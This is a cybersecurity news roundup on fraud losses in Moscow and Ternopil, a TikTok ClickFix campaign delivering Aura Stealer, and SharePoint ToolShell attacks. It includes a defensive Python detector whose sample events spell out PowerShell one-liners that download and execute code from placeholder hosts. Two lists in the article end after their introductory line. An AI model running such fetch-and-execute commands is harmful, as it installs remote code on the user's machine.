Scandals on TikTok: How Cybercriminals Use Social Media to Steal Billions

We have compiled the most significant cybersecurity news from the past week.

In the first half of 2025, cybercrime inflicted damages amounting to 34 billion rubles in Moscow. Colonel Anton Kononenko, head of the Department for Combating the Illegal Use of Information and Communication Technologies within the Ministry of Internal Affairs of Russia, shared this information in an interview with Interfax.

“Crimes are now being committed for amounts starting at one million rubles, with minor cases virtually nonexistent. Compared to previous years, the financial losses due to cyber fraud in the capital are on the rise,” Kononenko stated.

According to law enforcement data, cybercriminals set a record in the spring by stealing 450 million rubles.

Kononenko noted that over the last three years, the scale of losses has been increasing. Previously, most theft-related investigations involved amounts up to 50,000 rubles; now, around 80% of identified crimes fall into the categories of serious (with damages of 250,000 rubles) and especially serious offenses.

A 64-year-old resident of Ternopil became a victim of fraud, losing approximately 1 million hryvnias. This was reported by the press service of the Ternopil District Police Department.

According to law enforcement, the victim saw an advertisement on social media about investment courses promising income. He followed the link and contacted an individual claiming to be a broker-analyst.

After registering on the site, the pensioner began transferring funds from his electronic wallet to the specified account. When the total reached $28,100, the “broker” ceased communication, and access to the platform was blocked.

On October 17, ISC Handler analyst Xavier Mertens noted an ongoing campaign utilizing TikTok videos to facilitate hacking attacks.

Malware aimed at data theft is disguised as free guides for activating popular software like Windows, Spotify, and Netflix.

The creators of these videos employ a ClickFix social engineering technique, where the perpetrators present seemingly legitimate “solutions” or instructions to the victim.

In reality, they compel the individual to execute malicious PowerShell commands or other scripts that infect the computer.

Each video showcases a short one-liner command and encourages the viewer to run it as an administrator in PowerShell.

Once launched, the software connects to a remote site and downloads another script, which retrieves and installs two executable files from Cloudflare Pages. The first is a variant of Aura Stealer — malware designed to exfiltrate:

All data gathered is sent to the attackers, providing them access to the victim’s accounts.

Mertens added that an additional file, source.exe, is downloaded, utilizing the built-in Visual C# Compiler to self-assemble code. This code is then executed in memory. The purpose of the second module remains unclear at this time.
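From the defender's side, the chain described above leaves a recognisable trace in PowerShell script-block logging (Event ID 4104): a short one-liner that fetches remote content and pipes it straight into in-memory execution, often with a hidden window, an execution-policy bypass, or an elevation prompt. The following Python is an added example, not code from the original article or from the ISC diary, that scores such log records against those traits; the event records, host names and URLs are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample records shaped like PowerShell script-block logging
# events (Event ID 4104). Hosts and URLs are placeholders, not real captures.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01", "script": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 4104, "host": "ws02", "script": "irm https://pages.example.invalid/a | iex"},
    {"id": 4104, "host": "ws03", "script": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://example.invalid/x').Content\""},
    {"id": 4104, "host": "ws04", "script": "Start-Process powershell -Verb RunAs -ArgumentList '-c iex(irm https://example.invalid/y)'"},
]

# Each rule is (name, regex, weight). The traits mirror the ClickFix one-liner
# pattern: fetch something remote and execute it inline, quietly, as admin.
RULES = [
    ("remote_fetch", re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b", re.I), 2),
    ("inline_exec", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 2),
    ("elevation", re.compile(r"-Verb\s+RunAs", re.I), 1),
]


@dataclass
class Finding:
    host: str
    score: int
    hits: list


def score_script(text: str) -> tuple:
    """Return (score, matched rule names) for one script block."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def triage(events, threshold: int = 4) -> list:
    """Flag 4104 events whose indicator score meets the threshold.

    A single fetch or a single iex is common in admin scripts; the threshold
    asks for the combination (fetch + inline execution) before alerting.
    """
    findings = []
    for ev in events:
        if ev.get("id") != 4104:
            continue
        score, hits = score_script(ev["script"])
        if score >= threshold:
            findings.append(Finding(ev["host"], score, hits))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host}: score={f.score} hits={','.join(f.hits)}")
```

Raising the threshold trades recall for precision; the hidden-window and policy-bypass switches are what separate a pasted ClickFix command from an ordinary `iwr | iex` install snippet.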

Hackers linked to China have exploited the ToolShell vulnerability in Microsoft SharePoint to conduct attacks against government agencies, universities, telecommunications providers, and financial institutions. This is detailed in a report by Symantec.

The vulnerability affects locally hosted SharePoint servers. It became known in July following large-scale attacks by Chinese hackers. The vulnerability can be exploited remotely without authentication to execute code and gain full access to the file system.

During this campaign, the attackers deployed malware typically associated with the Chinese hacker group Salt Typhoon.

According to Symantec, ToolShell was used to compromise various organizations in the Middle East, South America, the United States, and Africa. The attacks impacted:

Interestingly, the attack was executed using legitimate executables from Trend Micro and BitDefender. In South America, the perpetrators used a file whose name closely resembled Symantec's.

Researchers noted that the publicly available tools employed in the attacks included Microsoft’s certutil, the GoGo Scanner, and Revsocks, a utility facilitating data exfiltration through a remote server.